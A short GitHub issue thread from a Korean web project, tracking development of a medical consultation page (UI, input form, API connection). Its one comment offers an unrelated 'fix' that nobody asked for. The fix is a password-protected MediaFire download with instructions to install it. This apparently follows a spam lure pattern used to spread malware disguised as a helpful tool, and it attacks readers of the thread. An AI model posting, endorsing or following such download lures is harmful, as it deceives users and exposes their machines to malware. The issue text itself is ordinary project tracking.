### ISSUE TITLE
feat : 진료 페이지 개발

### ISSUE THREAD

**Issue by KimDongGyun23** [alkong-dalkong/alkong-dalkong_fe#96]
## 기능
- 진료 페이지 개발

## 작업 상세 내용
- [x] 진료 정보 페이지 UI
- [x] 진료 정보 페이지 UI
- [x] 진료 정보 입력 폼 UI
- [x] 통신 연결

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
